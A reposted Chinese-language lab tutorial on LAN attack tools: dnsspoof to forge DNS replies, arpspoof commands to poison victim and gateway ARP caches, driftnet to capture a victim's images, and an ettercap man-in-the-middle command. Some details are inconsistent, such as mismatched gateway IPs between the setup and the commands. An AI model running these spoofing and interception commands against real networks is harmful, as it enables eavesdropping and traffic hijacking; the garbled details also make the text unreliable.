ARP欺騙工具的使用


很多內容來自freebuf

 

ARP協議包括

ARP請求:

主機A的ARP請求發送一個廣播給所有網絡的主機

的MAC地址。

RARP

RARP與ARP相反,RARP請求就是根據MAC地址來查找IP地址

RARP響應

RARP響應中包含了IP地址。

ARP工作在網絡層

 

 

 

 

1.DNSSPOOF

dnsspoof啟用DNS欺騙,如果dnsspoof嗅探到局域網內有DNS請求數據包,如果dnsspoof嗅探到局域網內有DNS請求數據包,它會分析其內容,並用偽造的DNS響應包來恢復請求者。當然,如果是請求解析某個域名,dnsspoof會讓域名重新指向另一個IP地址,(攻擊者的ip),如果反向IP指針解析,也會返回一個偽造的域名

-i   指定一個網卡

-f    指定要欺騙的網址,如果不確定,將返回本機的IP地址給攻擊者

試驗環境如下

將    192.168.132.129 作為攻擊者,在上面編輯文件host作為攻擊者的DNS紀錄文件

 

通過Dnsspoof開啟

 左邊的地址是誘騙的地址,右邊的是被攻擊者訪問的網站

作DNS解析是這樣的結果

2.ARPspoof

攻擊者     :192.168.132.132

被欺騙主機 :192.168.132.128

網關:       192.168.132.2

所以我們需要把受害者的流量引入攻擊者的主機,然后使用ARP欺騙,而網關將把原本流入受害者

的數據傳給攻擊者

首先,我們需要開啟端口轉發

 

將受害者的流量轉發給攻擊者

Arpspoof   -i  eth0  -t  192.168.132.128(被攻擊者)      192.168.132.130(網關)

Arpspoof   -i  eth0  -t  192.168.132.130(網關)      192.168.132.132(攻擊者)

driftnet -i eth0

我們可以通過driftnet  捕獲受害者的流量

當訪問圖片時候,流量被截獲

3. ettercap

ettercap 

               -t  只監聽這種協議

               -T  ettercap檢查pcap文件(脫機監聽)

               -q  不回顯

                -M 這是一個重要的參數,他會告訴ettercap執行中間人攻擊

ettercap

              ettercap -T  -q  -M ARP    /192.168.132.128/  //  監聽之后

             可以使用driftnet -i eth0   :可以捕獲相關圖片流量

                                        

              

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM